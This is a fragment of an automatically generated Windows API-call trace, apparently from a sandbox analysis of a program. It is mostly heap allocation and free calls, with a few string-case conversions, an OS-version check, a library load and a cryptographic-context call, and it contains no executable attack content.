dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.352] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0252.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0252.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.354] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.354] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.354] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.354] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.355] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.355] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.355] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.355] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.355] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.356] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.356] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.357] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.357] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0252.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.358] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.358] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.358] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0252.358] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.358] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0252.358] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.358] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.358] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.359] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.359] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.359] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.359] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0252.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0252.359] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.359] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.359] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.359] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.359] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.359] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0252.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0252.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.360] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0252.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0252.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0252.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0252.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0252.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0252.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0252.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0252.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.365] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0252.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: 